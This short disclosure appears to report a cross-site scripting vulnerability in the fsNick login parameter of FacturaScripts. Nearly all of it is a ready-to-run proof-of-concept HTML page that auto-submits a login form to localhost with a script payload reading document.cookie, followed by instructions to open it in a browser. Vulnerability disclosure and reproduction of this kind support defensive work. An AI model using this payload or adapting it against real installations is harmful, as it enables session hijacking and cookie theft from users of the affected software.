facturascripts is vulnerable to XSS in fsNick parameter
save this code as poc.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/" method="POST">
<input type="hidden" name="fsNick" value="1'"()&%<acx><ScRiPt >alert(document.cookie)</ScRiPt>" />
<input type="hidden" name="fsPassword" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
open file with your browser -> xss trigger